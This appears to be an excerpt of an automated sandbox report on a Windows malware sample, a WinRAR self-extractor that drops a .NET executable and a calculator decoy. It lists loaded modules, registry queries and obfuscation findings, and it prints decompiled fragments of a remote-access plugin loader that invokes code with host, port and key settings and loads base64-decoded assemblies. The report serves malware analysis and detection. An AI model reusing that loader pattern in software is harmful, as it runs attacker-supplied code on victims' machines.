                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vccorlib140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: msvcp140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: concrt140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: msvcp140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dcomp.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.datatransfer.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rometadata.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windowmanagementapi.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: inputhost.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: mrmcorer.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d11.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47mrm.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxcore.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d2d1.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dwrite.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uiamanager.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.immersive.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dataexchange.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: fontgroupsoverride.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.energy.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.graphics.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: winrttracing.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.phone.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: directmanipulation.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profext.dllJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.web.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                            Source: Ekpb7jn7mf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: calc.pdbGCTL source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
                            Source: Binary string: calc.pdb source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
                            Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Ekpb7jn7mf.exe

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: YsrQekGS.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: YsrQekGS.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: YsrQekGS.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: YsrQekGS.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: YsrQekGS.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: rKPaQokQ.exe.0.drStatic PE information: 0x8F598A9E [Sun Mar 18 18:21:18 2046 UTC]
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004254C5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_004254C5
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6674281Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041F891 push ecx; ret 0_2_0041F8A4
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041A250 push eax; ret 0_2_0041A26E
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B2727F2 pushad ; ret 4_2_00007FFD9B2727F9
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B272ACD push ecx; retf 4_2_00007FFD9B272AE6
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeCode function: 4_2_00007FFD9B279E0D push ebx; ret 4_2_00007FFD9B279E6A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B18D2A5 pushad ; iretd 10_2_00007FFD9B18D2A6
